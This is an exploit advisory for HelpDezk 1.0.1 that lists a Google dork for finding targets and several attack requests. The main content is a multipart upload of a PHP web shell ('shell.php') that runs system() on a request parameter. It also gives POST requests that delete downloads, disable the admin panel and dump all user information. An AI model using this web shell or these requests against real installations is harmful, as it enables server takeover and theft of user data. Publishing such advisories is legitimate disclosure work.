# Google Dork: "intext: helpdezk-community-1.0.1"
# Date: 26-2-2015
# Exploit Author: Dennis Veninga
# Vendor Homepage: http://www.helpdezk.org/
# Vendor contacted: 26-2-2015
# Version: 1.0.1
# Tested on: Firefox 36 & Chrome 38 / W8.1-x64
HelpDezk ->
Version: 1.0.1
Type: Multiple Critical Vulnerabilities
Severity: Critical
Info Exploit: Different exploits making it possible to take over the website/server
- Arbitrary File Upload
- Remote Command Execution
- User Information Disclosure
##############################
Arbitrary File Upload, 2 ways ->
1. Direct Access:
http://{target}/helpdezk/
#########
2. POST: http://localhost/helpdezk/
After posting this, visit http://{target}/helpdezk/app/
CONTENT:
-----------------------------
Content-Disposition: form-data; name="file"; filename="shell.php"\r\n
Content-Type: application/octet-stream\r\n
\r\n
<?php\r\n
if(isset($_REQUEST['cmd'])){\
$cmd = ($_REQUEST["cmd"]);\r\n
system($cmd);\r\n
echo "</pre>$cmd<pre>";\r\n
die;\r\n
}\r\n
?>\r\n
-----------------------------
##############################
Remote Command Execution, you see an white page with 'ok' when SUCCESS!
Delete a download
POST: http://localhost/helpdezk/
CONTENT: id={IDNUMBER}
Deactivate admin panel: *use /activate and id={IDNUMBER} to activate again*
POST: http://{localhost}/helpdezk/
CONTENT: id=1
id=1 = Admin
id=2 = Dashboard
id=3 = HelpDezk
##############################
User Information Disclosure
NOTE: Stop javascript, else it will quickly show all info and returns you to the login page.
POST: http://{target}/helpdezk/
CONTENT: typeperson=ALL
##############################
I'm sure I didn't find everything, but maybe time to fix those huge issues first!
Komentarų nėra:
Rašyti komentarą